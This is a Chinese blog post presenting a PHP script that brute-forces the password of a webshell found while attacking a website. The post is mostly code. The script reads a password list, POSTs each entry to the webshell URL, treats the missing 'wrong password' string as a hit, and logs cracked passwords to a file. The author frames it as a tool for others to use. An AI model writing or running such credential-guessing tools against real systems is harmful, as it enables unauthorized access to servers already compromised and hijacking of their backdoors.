webshell爆破脚本

撸站的时候遇到一个大马,在网上下载了无数webshell爆破器,没一个能用的!

真是鄙视这群写代码的,不测试就到处发布!

本来打算用c#写的,电脑没装环境,就用php写了一个!

因为php特性,单线程的,多开几个窗口吧!

<?php
$passarr=file("pass2.txt");
foreach ($passarr as $key => $value) {
        $value=str_replace(chr(10),"",str_replace(chr(13),"",$value));
        $gettoken=postdata("http://127.0.0.1/shell.php",array("postpass" => "{$value}"),"密码错误");
}
/*
/ postdata($url,$data,$par);
/ $url webshell地址 string
/ $data 把postdata换成你的密码参数
/ $par  错误关键词
*/
function postdata($url,$data,$par){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    $post_data = $data;
    curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
    $data1 = curl_exec($curl);
    curl_close($curl);
    if (strpos($data1, $par)>1) {
        print_r($data["postpass"]."错误\n");
        return;
    }else{
                file_put_contents("OOOK.txt",$data["postpass"],FILE_APPEND);
                die($data["postpass"]."爆破成功");
        }
    print_r(strpos($data1, $par));
    print_r($par);
        }
function decodeUnicode($str)
{
    return preg_replace_callback('/\\\\u([0-9a-f]{4})/i',
        create_function(
            '$matches',
            'return mb_convert_encoding(pack("H*", $matches[1]), "UTF-8", "UCS-2BE");'
        ),
        $str);
}
?>

H]4W3H4X}3GC)EJ1KE9(Q.png

  原文链接:http://www.5kik.com/other/630.html

相关文章

发表评论:

验证码

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。